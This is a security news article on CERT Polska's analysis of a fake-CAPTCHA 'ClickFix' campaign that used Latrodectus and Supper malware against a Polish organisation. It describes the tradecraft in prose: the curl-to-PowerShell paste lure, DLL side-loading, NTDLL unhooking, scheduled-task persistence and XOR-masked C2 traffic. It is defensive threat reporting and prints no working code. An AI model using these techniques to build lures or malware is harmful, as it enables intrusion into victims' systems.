The CAPTCHA Trap: How a Fake “ClickFix” Prompt Unleashed Latrodectus & Supper Malware
Ddos 
Image: CERT Polska
The simple act of verifying you are not a robot has been weaponized into a devastating corporate breach. Security researchers at CERT Polska have released a detailed forensic analysis of a recent incident where a “ClickFix” fake CAPTCHA campaign successfully compromised a major enterprise network.
The breach began not with a sophisticated zero-day exploit, but with a deceptive web prompt. According to the CERT Polska report, “A few months ago we became aware that a large Polish organisation was the victim of malware attack and the attacker was active within their network”.
The forensic trail quickly led the investigators to the initial infection vector: a fake CAPTCHA page.
Instead of asking users to identify traffic lights or crosswalks, the malicious page instructed the victim to perform a manual verification. “In this scenario, attacker attempts to convince the victim to copy a malicious snippet, and execute it using the Win+R shortcut,” the analysis explains.
By tricking the user into opening the Windows Run dialog and pasting a command (which utilized curl to pipe a payload directly into PowerShell), the attackers effectively bypassed initial perimeter defenses.
Interestingly, the attackers’ operational security wasn’t flawless. While analyzing the malicious JavaScript, researchers found a Telegram bot token that was too short to be valid. CERT Polska noted: “It’s possible that a mistake was made, but we also consider the option that the code was generated by an LLM and not modified”.
Once the PowerShell command executed, the attackers deployed the Latrodectus malware (specifically version 2.3) using a technique known as DLL side-loading.
The malware utilized legitimate Windows binaries to load a malicious file named wtsapi32.dll from the %APPDATA%\Intel directory.
Latrodectus came heavily armed with anti-analysis mechanisms to thwart defenders. It refused to execute via standard testing tools like rundll.exe or regsrv32.exe. However, its most evasive maneuver involved memory manipulation.
“The most challenging one was NTDLL unhooking, reading ntdll.dll from disk and manually importing it into process, bypassing typical AV and debugger detection mechanics,” the researchers revealed. The CERT Polska team ultimately defeated this by dumping the process memory immediately after the load sequence to recover the decrypted imports and strings.
Latrodectus was merely the door-opener. Deeper forensic analysis uncovered two additional packed DLLs belonging to the Supper malware family, an implant often utilized as a precursor to ransomware deployment.
To ensure they never lost access, the attackers established persistence by adding Supper as a scheduled task named “GoogleUpdateTask”.
The CERT Polska team managed to reverse-engineer Supper’s command-and-control (C2) communication protocol. They discovered the malware uses a custom encryption algorithm combined with a one-byte XOR key (the letter “M”) to mask its traffic. By cracking this protocol, researchers were able to interact with the C2 infrastructure, mapping out additional malicious IP addresses and identifying “decoy” IPs intended to confuse automated analysis tools.
The CERT Polska analysis underscores a dangerous evolution in initial access brokering. While the technical payloadsβLatrodectus and Supperβare highly sophisticated, they completely rely on a simple user deception to gain entry.
“Although the initial vector is relatively simple, fake CAPTCHA attacks have a significant potential for large disruption, because they give attacker immediate code execution capabilities,” the report concludes. Organizations are urged to educate employees that legitimate services will never ask them to open a command prompt or run dialog to verify their identity.
Related Posts:
- Latrodectus Malware Evolves: New Payload Features Enhance Evasion and Control
- Watch Out for Latrodectus: New Malware from Suspected IcedID Developers Targeting Businesses
- LATRODECTUS Malware Loader: Threat Poised to Replace ICEDID
- NGate NFC Malware Steals Cash from ATMs by Relaying EMV Data and PINs from Victim’s Phone
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
